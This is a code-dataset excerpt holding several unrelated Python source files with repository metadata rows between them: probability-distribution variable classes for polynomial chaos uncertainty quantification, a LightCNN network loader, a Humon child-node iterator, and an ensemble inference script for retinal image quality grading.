'The NormalVariable is usually not epistemic. For an epistemic '
'variable, consider using the uniform distribution with type '
'epistemic.'
)
showwarning = _warn
def generate_orthopoly(self):
"""
Generates the orthogonal polynomials for a normal variable up to the
order of polynomial expansion.
"""
self.var_orthopoly_vect = zeros(self.order + 1, 1)
x = self.x
for n in range(self.order + 1):
if n == 0:
self.var_orthopoly_vect[n] = 1
elif n == 1:
self.var_orthopoly_vect[n] = 2 * x
else:
self.var_orthopoly_vect[n] = (
2 * x * self.var_orthopoly_vect[n - 1] - 2 * (n - 1)
* self.var_orthopoly_vect[n - 2]
)
for n in range(self.order + 1): # transform into probabalists Hermite poly
self.var_orthopoly_vect[n] = (
2 ** (-n / 2)
* self.var_orthopoly_vect[n].subs({x:x / math.sqrt(2)})
)
self.var_orthopoly_vect = np.array(self.var_orthopoly_vect).astype(object).T[0]
def standardize(self, orig, std_vals):
"""
Inputs: orig- the un-standardized values
std_vals- the attribue name for the standardized vals
Overrides the Variable class standardize to align with
a normal distribution.
"""
original = getattr(self, orig)
standard = (original[:] - self.mean) / (self.stdev)
setattr(self, std_vals, standard)
return getattr(self, std_vals)
def standardize_points(self, values):
"""
Inputs: values- unstandardized points corresponding to the variable's
distribution
Standardizes and returns the inputs points.
"""
return (values - self.mean) / (self.stdev)
def unstandardize_points(self, value):
"""
Inputs: value- the standardized value to be unstandardized
Calculates and returns the unscaled variable value from the
standardized value.
"""
return (value * self.stdev) + self.mean
def check_distribution(self):
"""
Overrides the Variable class check_distribution to align with
a normal distribution.
"""
comm = MPI_COMM_WORLD
rank = comm.rank
if rank == 0 and (np.max(self.std_vals) > 4.5) or (np.min(self.std_vals) < -4.5):
warn(
f'Large standardized value for variable {self.name} '
'with normal distribution found. Check input and run matrix.'
)
return -1
def generate_samples(self, samp_size):
"""
Inputs: samp_size- the number of points needed to be generated
Overrides the Variable class generate_samples to align with
a normal distribution.
"""
low_percent = 8e-17
high_percent = 1 - low_percent
dist = norm(loc=self.mean, scale=self.stdev)
rnd_hypercube = uniform_hypercube(low_percent, high_percent, samp_size)
vals = dist.ppf(rnd_hypercube)
return vals
def get_norm_sq_val(self, matrix_value):
"""
Inputs: matrix_val- the value in the model matrix to consider
Overrides the Variable class get_norm_sq_val to align with
a normal distribution.
"""
return math.factorial(matrix_value)
def get_resamp_vals(self, samp_size):
"""
Inputs: samp_size- the number of samples to generate according to the
distribution
Overrides the Variable class get_resamp_vals to align with
a normal distribution.
"""
comm = MPI_COMM_WORLD
size = comm.size
rank = comm.rank
base = samp_size // size
rem = samp_size % size
count = base + (rank < rem)
ranks = np.arange(0, size, dtype=int)
seq_count = (ranks < rem) + base
seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks
self.resample = np.zeros(samp_size)
resample = np.random.randn(count)
comm.Allgatherv(
[resample, count, MPI_DOUBLE],
[self.resample, seq_count, seq_disp, MPI_DOUBLE]
)
return self.resample
def check_num_string(self):
"""
Searches to replace sring 'pi' with its numpy equivalent in any of the
values that might contain it.
"""
if isinstance(self.mean, str) and 'pi' in self.mean:
self.mean = float(self.mean.replace('pi', str(np.pi)))
if isinstance(self.stdev, str) and 'pi' in self.stdev:
self.stdev = float(self.stdev.replace('pi', str(np.pi)))
def get_mean(self):
"""
Return the mean of the variable.
"""
return self.mean
class BetaVariable(ContinuousVariable):
"""
Inputs: alpha- the alpha parameter of the variable
beta- the beta parameter of the variable
interval_low- the low interval of the variable
interval_high- the high interval of the variable
order- the order of the model to calculate the orthogonal
polynomials and norm squared values
type- the type of variable
name- the name of the variable
number- the number of the variable from the file
Represents a beta variable. The methods in this class correspond to
those of a beta variable.
"""
__slots__ = ('alpha', 'beta')
equation = '((A+B-1)! * (x)**(A-1) * (1-x)**(B-1)) / ((A-1)! * (B-1)!)'
def __init__(self, alpha, beta, interval_low=0.0, interval_high=1.0, order=2,
type='aleatory', name='', number=0
):
if not (
(interval_low is self.__init__.__defaults__[0])
== (interval_high is self.__init__.__defaults__[1])
):
raise VariableInputError(
'For BetaVariable, if interval_low or interval_high is '
'provided, both must be provided.'
)
if not ((alpha > 0) and (beta > 0)):
raise VariableInputError(
'BetaVariable alpha and beta must be greater than 0.'
)
self.alpha = alpha
self.beta = beta
self.interval_low = interval_low
self.interval_high = interval_high
self.order = order
self.type = UncertaintyType.from_name(type)
self.name = f'x{number}' if name == '' else name
self.var_str = f'x{number}'
self.x = symbols(self.var_str)
self.distribution = Distribution.BETA
low = 0
high = 1
self.std_bounds = (self.interval_low, self.interval_high)
parsed_dist = parse_expr(
self.equation,
local_dict={
'A':parse_expr(str(Fraction(self.alpha))),
'B':parse_expr(str(Fraction(self.beta))),
'x':self.x
}
)
self.generate_orthopoly()
self.create_norm_sq(low, high, parsed_dist)
self.low_approx = self.interval_low
self.high_approx = self.interval_high
self.bounds = (self.interval_low, self.interval_high)
self.check_num_string()
if self.type == UncertaintyType.EPISTEMIC:
warn(
'The BetaVariable is usually not epistemic. For an epistemic '
'variable, consider using the uniform distribution with type '
'epistemic.'
)
showwarning = _warn
def generate_orthopoly(self):
"""
Generates the orthogonal polynomials for a beta variable up to the
self.self.order of polynomial expansion.
"""
var_orthopoly_vect = np.zeros(self.order + 1, dtype=object)
self.var_orthopoly_vect = np.zeros(self.order + 1, dtype=object)
x = self.x
a = parse_expr(str(Fraction(self.alpha)))
b = parse_expr(str(Fraction(self.beta)))
decimals = 30
for n in range(self.order + 1):
if n == 0:
var_orthopoly_vect[n] = 1
self.var_orthopoly_vect[n] = 1
elif n == 1:
var_orthopoly_vect[n] = x - (a / (a + b))
self.var_orthopoly_vect[n] = x - (a / (a + b))
else:
var_orthopoly_vect[n] = x ** n
pasc = pascal(self.order + 1, kind='lower')
for m in range(n):
var_orthopoly_vect[n] -= parse_expr(
f'{pasc[n, m]} * ((a+n-1)!*(a+b+2*m-1)!)/((a+m-1)!*(a+b+n+m-1)!)*({var_orthopoly_vect[m]})',
local_dict={'a':a, 'b':b, 'n':n, 'm':m, 'x':x}
)
self.var_orthopoly_vect[n] = N(var_orthopoly_vect[n], decimals)
return self.var_orthopoly_vect
def standardize(self, orig, std_vals):
"""
Inputs: orig- the un-standardized values
std_vals- the attribue name for the standardized vals
Overrides the Variable class standardize to align with
a beta distribution.
"""
original = getattr(self, orig)
standard = (
(original[:] - self.interval_low)
/ (self.interval_high - self.interval_low)
)
setattr(self, std_vals, standard)
return getattr(self, std_vals)
def standardize_points(self, values):
"""
Inputs: values- unstandardized points corresponding to the variable's
distribution
Standardizes and returns the inputs points.
"""
standard = (
(values - self.interval_low)
/ (self.interval_high - self.interval_low)
)
return standard
def unstandardize_points(self, value):
"""
Inputs: value- the standardized value to be unstandardized
Calculates and returns the unscaled variable value from the
standardized value.
"""
unscaled_value = value = (
value * (self.interval_high - self.interval_low)
+self.interval_low
)
return unscaled_value
def check_distribution(self):
"""
Overrides the Variable class check_distribution to align with
an beta distribution.
"""
shift = 8
comm = MPI_COMM_WORLD
rank = comm.rank
if rank == 0 and (np.max(self.std_vals) > shift) or (np.min(self.std_vals) < -shift):
warn(
f'Large standardized value for variable {self.name} '
'with Beta distribution found. Check input and run matrix.'
)
return -1
def generate_samples(self, samp_size):
"""
Inputs: samp_size- the number of points needed to be generated
Overrides the Variable class generate_samples to align with
an beta distribution.
"""
low_percent = 0
high_percent = 1
dist = beta(a=self.alpha, b=self.beta)
rnd_hypercube = uniform_hypercube(low_percent, high_percent, samp_size)
vals = (
(dist.ppf(rnd_hypercube) * (self.interval_high - self.interval_low))
+self.interval_low
)
return vals
def get_resamp_vals(self, samp_size):
"""
Inputs: samp_size- the number of samples to generate according to the
distribution
Overrides the Variable class get_resamp_vals to align with
an beta distribution.
"""
comm = MPI_COMM_WORLD
size = comm.size
rank = comm.rank
base = samp_size // size
rem = samp_size % size
count = base + (rank < rem)
ranks = np.arange(0, size, dtype=int)
seq_count = (ranks < rem) + base
seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks
self.resample = np.zeros(samp_size)
resample = np.random.beta(a=self.alpha, b=self.beta, size=count)
comm.Allgatherv(
[resample, count, MPI_DOUBLE],
[self.resample, seq_count, seq_disp, MPI_DOUBLE]
)
# The bound is included to help with ProbabilityBox convergence.
self.resample[0] = 0
self.resample[1] = 1
return self.resample
def check_num_string(self):
"""
Searches to replace sring 'pi' with its numpy equivalent in any of the
values that might contain it.
"""
if isinstance(self.alpha, str) and 'pi' in self.alpha:
self.alpha = float(self.alpha.replace('pi', str(np.pi)))
if isinstance(self.beta, str) and 'pi' in self.beta:
self.beta = float(self.beta.replace('pi', str(np.pi)))
if isinstance(self.interval_low, str) and 'pi' in self.interval_low:
self.interval_low = float(self.interval_low.replace('pi', str(np.pi)))
if isinstance(self.interval_high, str) and 'pi' in self.interval_high:
self.interval_high = float(self.interval_high.replace('pi', str(np.pi)))
def get_mean(self):
"""
Return the mean of the variable.
"""
scale = self.interval_high - self.interval_low
mean = (
self.interval_low + scale * (self.alpha / (self.alpha + self.beta))
)
return mean
class ExponentialVariable(ContinuousVariable):
"""
Inputs: lambd- the lambda parameter of the variable values
interval_low- the low interval of the variable
order- the order of the model to calculate the orthogonal
polynomials and norm squared values
type- the type of variable
name- the name of the variable
number- the number of the variable from the file
Represents an exponential variable. The methods in this class correspond to
those of an exponential variable.
"""
__slots__ = ('lambda')
equation = 'lambd * exp(-lambd * x)'
def __init__(
self, lambd, interval_low=0, order=2, type='aleatory',
name='', number=0
):
if lambd <= 0:
raise VariableInputError(
'ExponentialVariable lambd must be greater than 0.'
)
setattr(self, 'lambda', lambd)
self.interval_low = interval_low
self.order = order
self.type = UncertaintyType.from_name(type)
self.name = f'x{number}' if name == '' else name
self.var_str = f'x{number}'
self.x = symbols(self.var_str)
self.distribution = Distribution.EXPONENTIAL
low = 0
high = 'oo'
parsed_dist = parse_expr(
self.equation,
local_dict={
'lambd':parse_expr(str(Fraction(getattr(self, 'lambda')))),
'x':self.x
}
)
# if inf bounds, find approximate bound
low_percent = 8e-17
high_percent = 1 - low_percent
dist = expon(getattr(self, 'lambda'))
self.low_approx = self.interval_low
self.high_approx = dist.ppf(high_percent)
self.bounds = (self.interval_low, self.high_approx)
self.std_bounds = (low, self.standardize_points(self.high_approx))
self.recursive_var_basis(parsed_dist, low, high, self.order)
self.create_norm_sq(low, high, parsed_dist)
self.check_num_string()
if self.type == UncertaintyType.EPISTEMIC:
warn(
'The ExponentialVariable is usually not epistemic. For an epistemic '
'variable, consider using the uniform distribution with type '
'epistemic.'
)
showwarning = _warn
def standardize(self, orig, std_vals):
"""
Inputs: orig- the un-standardized values
std_vals- the attribue name for the standardized vals
Overrides the Variable class standardize to align with an exponential distribution.
"""
original = getattr(self, orig)
standard = (original[:] - self.interval_low)
setattr(self, std_vals, standard)
return getattr(self, std_vals)
def standardize_points(self, values):
"""
Inputs: values- unstandardized points corresponding to the variable's
distribution
Standardizes and returns the inputs points.
"""
return values - self.interval_low
def unstandardize_points(self, value):
"""
Inputs: value- the standardized value to be unstandardized
Calculates and returns the unscaled variable value from the
standardized value.
"""
return value + self.interval_low
def check_distribution(self):
"""
Overrides the Variable class check_distribution to align with
an exponential distribution.
"""
shift = 15
comm = MPI_COMM_WORLD
rank = comm.rank
if rank == 0 and ((np.min(self.std_vals) < 0)
or (np.max(self.std_vals) > shift)
):
warn(
f'Large standardized value for variable {self.name} '
'with exponential distribution found. Check input and run '
'matrix.'
)
return -1
def generate_samples(self, samp_size):
"""
Inputs: samp_size- the number of samples to generate according to the
distribution
Overrides the Variable class generate_samples to align with
an exponential distribution.
"""
percent_shift = 8e-17
low_percent = 0
high_percent = 1 - percent_shift
dist = expon(scale=1 / getattr(self, 'lambda'))
rnd_hypercube = uniform_hypercube(low_percent, high_percent, samp_size)
vals = dist.ppf(rnd_hypercube) + self.interval_low
np.random.shuffle(vals)
return vals
def get_resamp_vals(self, samp_size):
"""
Inputs: samp_size- the number of samples to generate according to the
distribution
Overrides the Variable class get_resamp_vals to align with
an exponential distribution.
"""
comm = MPI_COMM_WORLD
size = comm.size
rank = comm.rank
base = samp_size // size
rem = samp_size % size
count = base + (rank < rem)
ranks = np.arange(0, size, dtype=int)
seq_count = (ranks < rem) + base
seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks
self.resample = np.zeros(samp_size)
resample = np.random.exponential(
scale=(1 / getattr(self, 'lambda')), size=count
)
comm.Allgatherv(
[resample, count, MPI_DOUBLE],
[self.resample, seq_count, seq_disp, MPI_DOUBLE]
)
# The bound is included to help with ProbabilityBox convergence.
self.resample[0] = 0
return self.resample
def check_num_string(self):
"""
Searches to replace sring 'pi' with its numpy equivalent in any of the
values that might contain it.
"""
lambd = getattr(self, 'lambda')
if isinstance(lambd, str) and 'pi' in lambd:
setattr(self, 'lambda', float(lambd.replace('pi', str(np.pi))))
def get_mean(self):
"""
Return the mean of the variable.
"""
return self.interval_low + (1 / getattr(self, 'lambda'))
class GammaVariable(ContinuousVariable):
"""
Inputs: alpha- the alpha parameter of the variable
theta- the theta parameter of the variable
interval_low- the low interval of the variable
order- the order of the model to calculate the orthogonal
polynomials and norm squared values
type- the type of variable
name- the name of the variable
number- the number of the variable from the file
Represents a gamma variable. The methods in this class correspond to
those of a gamma variable.
"""
__slots__ = ('alpha', 'theta')
# This is the standardized form required for the UQPCE variable basis and
# norm squared.
equation = '(x**(A-1) * exp(-x)) / (A-1)!'
def __init__(
self, alpha, theta, interval_low=0, order=2, type='aleatory',
name='', number=0
):
if not ((alpha > 0) and (theta > 0)):
raise VariableInputError(
'GammaVariable alpha and theta must be greater than 0.'
)
self.alpha = alpha
self.theta = theta
self.interval_low = interval_low
self.order = order
self.type = UncertaintyType.from_name(type)
self.name = f'x{number}' if name == '' else name
self.var_str = f'x{number}'
self.x = symbols(self.var_str)
self.distribution = Distribution.GAMMA
low = 0
high = 'oo'
self.check_num_string()
if self.type == UncertaintyType.EPISTEMIC:
warn(
'The ExponentialVariable is usually not epistemic. For an epistemic '
'variable, consider using the uniform distribution with type '
'epistemic.'
)
showwarning = _warn
x = symbols(self.var_str)
parsed_dist = parse_expr(
self.equation,
local_dict={'A':parse_expr(str(Fraction(self.alpha))), 'x':x}
)
self.recursive_var_basis(parsed_dist, low, high, self.order)
self.norm_sq_vals = np.zeros(len(self.var_orthopoly_vect))
self.create_norm_sq(low, high, parsed_dist)
# if inf bounds, find approximate bound
low_percent = 8e-17
high_percent = 1 - low_percent
dist = gamma(self.alpha, scale=self.theta)
self.low_approx = self.interval_low
self.high_approx = dist.ppf(high_percent)
upper = dist.ppf(high_percent)
self.bounds = (self.interval_low, upper)
self.std_bounds = (low, self.standardize_points(upper))
def standardize(self, orig, std_vals):
"""
Inputs: orig- the un-standardized values
std_vals- the attribue name for the standardized vals
Overrides the Variable class standardize to align with
a gamma distribution.
"""
standard = (getattr(self, orig) - self.interval_low) / self.theta
setattr(self, std_vals, standard)
return getattr(self, std_vals)
def standardize_points(self, values):
"""
Inputs: values- unstandardized points corresponding to the variable's
distribution
Standardizes and returns the inputs points.
"""
return (values - self.interval_low) / self.theta
def unstandardize_points(self, value):
"""
Inputs: value- the standardized value to be unstandardized
Calculates and returns the unscaled variable value from the
standardized value.
"""
return (value * self.theta) + self.interval_low
def check_distribution(self):
"""
Overrides the Variable class check_distribution to align with
a gamma distribution.
"""
shift = 15
comm = MPI_COMM_WORLD
rank = comm.rank
if rank == 0 and ((np.max(self.std_vals) > shift)
or (np.min(self.std_vals) < 0)
):
warn(
f'Large standardized value for variable {self.name} '
'with gamma distribution found. Check input and run matrix.'
)
return -1
def generate_samples(self, samp_size):
"""
Inputs: samp_size- the number of points needed to be generated
Overrides the Variable class generate_samples to align with
a gamma distribution.
"""
percent_shift = 8e-17
low_percent = 0
high_percent = 1 - percent_shift
dist = gamma(self.alpha, scale=self.theta)
rnd_hypercube = uniform_hypercube(low_percent, high_percent, samp_size)
vals = dist.ppf(rnd_hypercube) + self.interval_low
return vals
def get_resamp_vals(self, samp_size):
"""
Inputs: samp_size- the number of samples to generate according to the
distribution
Overrides the Variable class get_resamp_vals to align with
a gamma distribution.
"""
comm = MPI_COMM_WORLD
size = comm.size
rank = comm.rank
base = samp_size // size
rem = samp_size % size
count = base + (rank < rem)
ranks = np.arange(0, size, dtype=int)
seq_count = (ranks < rem) + base
seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks
self.resample = np.zeros(samp_size)
resample = np.random.gamma(shape=self.alpha, scale=1, size=count)
comm.Allgatherv(
[resample, count, MPI_DOUBLE],
[self.resample, seq_count, seq_disp, MPI_DOUBLE]
)
# The bound is included to help with ProbabilityBox convergence.
self.resample[0] = 0
return self.resample
def check_num_string(self):
"""
Searches to replace sring 'pi' with its numpy equivalent in any of the
values that might contain it.
"""
if isinstance(self.alpha, str) and 'pi' in self.alpha:
self.alpha = float(self.alpha.replace('pi', str(np.pi)))
if isinstance(self.theta, str) and 'pi' in self.theta:
self.theta = float(self.theta.replace('pi', str(np.pi)))
def get_mean(self):
"""
Return the mean of the variable.
"""
return self.interval_low + (self.alpha * self.theta)
| 9,264 | 0 | 162 |
3b43290f57f5361d72dccd25ab08a3672574209a | 518 | py | Python | knn/test_light_cnn_in_numpy.py | Starman-SWA/Face-recognition-trolley-based-on-AX7010-FPGA-board | d518158c20da4b3f2536867cfda30848911d08c7 | [
"MIT"
] | 1 | 2021-02-05T03:17:43.000Z | 2021-02-05T03:17:43.000Z | knn/test_light_cnn_in_numpy.py | Starman-SWA/Face-recognition-trolley-based-on-AX7010-FPGA-board | d518158c20da4b3f2536867cfda30848911d08c7 | [
"MIT"
] | null | null | null | knn/test_light_cnn_in_numpy.py | Starman-SWA/Face-recognition-trolley-based-on-AX7010-FPGA-board | d518158c20da4b3f2536867cfda30848911d08c7 | [
"MIT"
] | 2 | 2020-10-20T12:36:35.000Z | 2021-02-05T03:37:30.000Z | import os
import numpy as np
import cv2
from module.lightCNN_model_in_numpy import LightCNN9_in_numpy
def get_net(path):
'''
be used to get class net
:param para:
:return:
'''
print('Loading network...')
cfg = np.load(path, allow_pickle=True)
cfg = cfg.item()
net = LightCNN9_in_numpy(cfg)
return net
if __name__ == '__main__':
get_net() | 20.72 | 61 | 0.65444 | import os
import numpy as np
import cv2
from module.lightCNN_model_in_numpy import LightCNN9_in_numpy
def get_net(path):
'''
be used to get class net
:param para:
:return:
'''
print('Loading network...')
cfg = np.load(path, allow_pickle=True)
cfg = cfg.item()
net = LightCNN9_in_numpy(cfg)
return net
def get_feature(net, data,length2=0):
data = net(data)
data = data.reshape(-1, data.shape[0], data.shape[1])
return data
if __name__ == '__main__':
get_net() | 111 | 0 | 23 |
74e42152f180c52cf37b991dd6644029a8a92167 | 414 | py | Python | humon/iterators.py | spacemeat/humon-py | f67119be656c169fda5624ef1d33d639e0e84809 | [
"MIT"
] | null | null | null | humon/iterators.py | spacemeat/humon-py | f67119be656c169fda5624ef1d33d639e0e84809 | [
"MIT"
] | null | null | null | humon/iterators.py | spacemeat/humon-py | f67119be656c169fda5624ef1d33d639e0e84809 | [
"MIT"
] | null | null | null | class ChildNodeIterator:
'''Iterates over a Humon node's children.'''
def __next__(self):
'''Iterate.'''
if self.idx < self.node.numChildren:
res = self.node.getChild(self.idx)
self.idx += 1
return res
raise StopIteration
| 21.789474 | 48 | 0.550725 | class ChildNodeIterator:
'''Iterates over a Humon node's children.'''
def __init__(self, node):
self.node = node
self.idx = 0
def __iter__(self):
return self
def __next__(self):
'''Iterate.'''
if self.idx < self.node.numChildren:
res = self.node.getChild(self.idx)
self.idx += 1
return res
raise StopIteration
| 68 | 0 | 53 |
f0b51b9f7d466f08118ff51d5a5c47810f375d48 | 13,354 | py | Python | M1_Retinal_Image_quality_EyePACS/test_outside.py | rmaphoh/AutoMorph | 0c82ce322c6cd8bd80f06bbd85c5c2542e534cb8 | [
"Apache-2.0"
] | 1 | 2022-01-28T00:56:23.000Z | 2022-01-28T00:56:23.000Z | M1_Retinal_Image_quality_EyePACS/test_outside.py | rmaphoh/AutoMorph | 0c82ce322c6cd8bd80f06bbd85c5c2542e534cb8 | [
"Apache-2.0"
] | null | null | null | M1_Retinal_Image_quality_EyePACS/test_outside.py | rmaphoh/AutoMorph | 0c82ce322c6cd8bd80f06bbd85c5c2542e534cb8 | [
"Apache-2.0"
] | null | null | null |
'''
Code of testing
'''
import argparse
import logging
import os
import sys
import csv
import time
import torch
import numpy as np
import pandas as pd
import torch.nn as nn
from tqdm import tqdm
from pycm import *
import matplotlib
import matplotlib.pyplot as plt
from dataset import BasicDataset_OUT
from torch.utils.data import DataLoader
from model import Resnet101_fl, InceptionV3_fl, Densenet161_fl, Resnext101_32x8d_fl, MobilenetV2_fl, Vgg16_bn_fl, Efficientnet_fl
#torch.distributed.init_process_group(backend="nccl")
font = {
'weight' : 'normal',
'size' : 18}
plt.rc('font',family='Times New Roman')
matplotlib.rc('font', **font)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')
args = get_args()
torch.cuda.set_device(args.local_rank)
device = torch.device("cuda", args.local_rank)
#logging.info(f'Using device {device}')
test_dir = args.test_dir
dataset=args.dataset
img_size= (512,512)
if args.model=='inceptionv3':
model_fl = InceptionV3_fl(pretrained=True)
if args.model=='densenet161':
model_fl = Densenet161_fl(pretrained=True)
if args.model == 'resnet101':
model_fl = Resnet101_fl(pretrained=True)
if args.model == 'resnext101':
model_fl_1 = Resnext101_32x8d_fl(pretrained=True)
model_fl_2 = Resnext101_32x8d_fl(pretrained=True)
model_fl_3 = Resnext101_32x8d_fl(pretrained=True)
model_fl_4 = Resnext101_32x8d_fl(pretrained=True)
model_fl_5 = Resnext101_32x8d_fl(pretrained=True)
model_fl_6 = Resnext101_32x8d_fl(pretrained=True)
model_fl_7 = Resnext101_32x8d_fl(pretrained=True)
model_fl_8 = Resnext101_32x8d_fl(pretrained=True)
if args.model == 'efficientnet':
model_fl_1 = Efficientnet_fl(pretrained=True)
model_fl_2 = Efficientnet_fl(pretrained=True)
model_fl_3 = Efficientnet_fl(pretrained=True)
model_fl_4 = Efficientnet_fl(pretrained=True)
model_fl_5 = Efficientnet_fl(pretrained=True)
model_fl_6 = Efficientnet_fl(pretrained=True)
model_fl_7 = Efficientnet_fl(pretrained=True)
model_fl_8 = Efficientnet_fl(pretrained=True)
if args.model == 'mobilenetv2':
model_fl = MobilenetV2_fl(pretrained=True)
if args.model == 'vgg16bn':
model_fl = Vgg16_bn_fl(pretrained=True)
checkpoint_path_1 = './{}/{}/{}/7_seed_28/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
checkpoint_path_2 = './{}/{}/{}/6_seed_30/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
checkpoint_path_3 = './{}/{}/{}/5_seed_32/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
checkpoint_path_4 = './{}/{}/{}/4_seed_34/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
checkpoint_path_5 = './{}/{}/{}/3_seed_36/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
checkpoint_path_6 = './{}/{}/{}/2_seed_38/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
checkpoint_path_7 = './{}/{}/{}/1_seed_40/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
checkpoint_path_8 = './{}/{}/{}/0_seed_42/best_loss_checkpoint.pth'.format(args.task, args.load, args.model )
model_fl_1.to(device=device)
model_fl_2.to(device=device)
model_fl_3.to(device=device)
model_fl_4.to(device=device)
model_fl_5.to(device=device)
model_fl_6.to(device=device)
model_fl_7.to(device=device)
model_fl_8.to(device=device)
map_location = {'cuda:%d' % 0: 'cuda:%d' % args.local_rank}
if args.load:
model_fl_1.load_state_dict(
torch.load(checkpoint_path_1, map_location="cuda:0")
)
model_fl_2.load_state_dict(
torch.load(checkpoint_path_2, map_location="cuda:0")
)
model_fl_3.load_state_dict(
torch.load(checkpoint_path_3, map_location="cuda:0")
)
model_fl_4.load_state_dict(
torch.load(checkpoint_path_4, map_location="cuda:0")
)
model_fl_5.load_state_dict(
torch.load(checkpoint_path_5, map_location="cuda:0")
)
model_fl_6.load_state_dict(
torch.load(checkpoint_path_6, map_location="cuda:0")
)
model_fl_7.load_state_dict(
torch.load(checkpoint_path_7, map_location="cuda:0")
)
model_fl_8.load_state_dict(
torch.load(checkpoint_path_8, map_location="cuda:0")
)
# faster convolutions, but more memory
# cudnn.benchmark = True
try:
test_net(model_fl_1,
model_fl_2,
model_fl_3,
model_fl_4,
model_fl_5,
model_fl_6,
model_fl_7,
model_fl_8,
test_dir,
device=device,
epochs=args.epochs,
batch_size=args.batchsize,
image_size=img_size)
except KeyboardInterrupt:
torch.save(model_fl.state_dict(), 'INTERRUPTED.pth')
logging.info('Saved interrupt')
try:
sys.exit(0)
except SystemExit:
os._exit(0)
| 43.640523 | 384 | 0.626704 |
'''
Code of testing
'''
import argparse
import logging
import os
import sys
import csv
import time
import torch
import numpy as np
import pandas as pd
import torch.nn as nn
from tqdm import tqdm
from pycm import *
import matplotlib
import matplotlib.pyplot as plt
from dataset import BasicDataset_OUT
from torch.utils.data import DataLoader
from model import Resnet101_fl, InceptionV3_fl, Densenet161_fl, Resnext101_32x8d_fl, MobilenetV2_fl, Vgg16_bn_fl, Efficientnet_fl
#torch.distributed.init_process_group(backend="nccl")
font = {
'weight' : 'normal',
'size' : 18}
plt.rc('font',family='Times New Roman')
matplotlib.rc('font', **font)
def test_net(model_fl_1,
model_fl_2,
model_fl_3,
model_fl_4,
model_fl_5,
model_fl_6,
model_fl_7,
model_fl_8,
test_dir,
device,
epochs=5,
batch_size=20,
image_size=(512,512),
save_cp=True,
):
since = time.time()
storage_path ="Ensemble_exp_{}/{}/train_on_{}/test_on_{}/".format(args.task, args.load, args.model, args.dataset)
#dir_mask = "./data/{}/training/1st_manual/".format(args.dataset)
dataset_name = args.dataset
n_classes = args.n_class
# create files
if not os.path.isdir(storage_path):
os.makedirs(storage_path)
dataset = BasicDataset_OUT(test_dir, image_size, n_classes, train_or=False)
n_test = len(dataset)
val_loader = DataLoader(dataset, batch_size, shuffle=False, num_workers=16, pin_memory=False, drop_last=False)
prediction_decode_list = []
filename_list = []
prediction_list_mean = []
prediction_list_std = []
mask_pred_tensor_small_all = 0
for epoch in range(epochs):
model_fl_1.eval()
model_fl_2.eval()
model_fl_3.eval()
model_fl_4.eval()
model_fl_5.eval()
model_fl_6.eval()
model_fl_7.eval()
model_fl_8.eval()
with tqdm(total=n_test, desc=f'Epoch {epoch + 1}/{epochs}', unit='img') as pbar:
for batch in val_loader:
imgs = batch['image']
filename = batch['img_file'][0]
mask_pred_tensor_small_all = 0
imgs = imgs.to(device=device, dtype=torch.float32)
##################sigmoid or softmax
prediction_list = []
with torch.no_grad():
#print(real_patch.size())
prediction = model_fl_1(imgs)
prediction_softmax = nn.Softmax(dim=1)(prediction)
mask_pred_tensor_small = prediction_softmax.clone().detach()
mask_pred_tensor_small_all+=mask_pred_tensor_small.type(torch.FloatTensor)
prediction_list.append(mask_pred_tensor_small.type(torch.FloatTensor).cpu().detach().numpy())
prediction = model_fl_2(imgs)
prediction_softmax = nn.Softmax(dim=1)(prediction)
mask_pred_tensor_small = prediction_softmax.clone().detach()
mask_pred_tensor_small_all+=mask_pred_tensor_small.type(torch.FloatTensor)
prediction_list.append(mask_pred_tensor_small.type(torch.FloatTensor).cpu().detach().numpy())
prediction = model_fl_3(imgs)
prediction_softmax = nn.Softmax(dim=1)(prediction)
mask_pred_tensor_small = prediction_softmax.clone().detach()
mask_pred_tensor_small_all+=mask_pred_tensor_small.type(torch.FloatTensor)
prediction_list.append(mask_pred_tensor_small.type(torch.FloatTensor).cpu().detach().numpy())
prediction = model_fl_4(imgs)
prediction_softmax = nn.Softmax(dim=1)(prediction)
mask_pred_tensor_small = prediction_softmax.clone().detach()
mask_pred_tensor_small_all+=mask_pred_tensor_small.type(torch.FloatTensor)
prediction_list.append(mask_pred_tensor_small.type(torch.FloatTensor).cpu().detach().numpy())
prediction = model_fl_5(imgs)
prediction_softmax = nn.Softmax(dim=1)(prediction)
mask_pred_tensor_small = prediction_softmax.clone().detach()
mask_pred_tensor_small_all+=mask_pred_tensor_small.type(torch.FloatTensor)
prediction_list.append(mask_pred_tensor_small.type(torch.FloatTensor).cpu().detach().numpy())
prediction = model_fl_6(imgs)
prediction_softmax = nn.Softmax(dim=1)(prediction)
mask_pred_tensor_small = prediction_softmax.clone().detach()
mask_pred_tensor_small_all+=mask_pred_tensor_small.type(torch.FloatTensor)
prediction_list.append(mask_pred_tensor_small.type(torch.FloatTensor).cpu().detach().numpy())
prediction = model_fl_7(imgs)
prediction_softmax = nn.Softmax(dim=1)(prediction)
mask_pred_tensor_small = prediction_softmax.clone().detach()
mask_pred_tensor_small_all+=mask_pred_tensor_small.type(torch.FloatTensor)
prediction_list.append(mask_pred_tensor_small.type(torch.FloatTensor).cpu().detach().numpy())
prediction = model_fl_8(imgs)
prediction_softmax = nn.Softmax(dim=1)(prediction)
mask_pred_tensor_small = prediction_softmax.clone().detach()
mask_pred_tensor_small_all+=mask_pred_tensor_small.type(torch.FloatTensor)
prediction_list.append(mask_pred_tensor_small.type(torch.FloatTensor).cpu().detach().numpy())
mask_pred_tensor_small_all = mask_pred_tensor_small_all/8
_,prediction_decode = torch.max(mask_pred_tensor_small_all, 1)
prediction_list = np.array(prediction_list)
prediction_list_mean.extend(np.mean(prediction_list, axis=0))
prediction_list_std.extend(np.std(prediction_list, axis=0))
prediction_decode_list.extend(prediction_decode.cpu().detach().numpy())
filename_list.extend(filename)
pbar.update(imgs.shape[0])
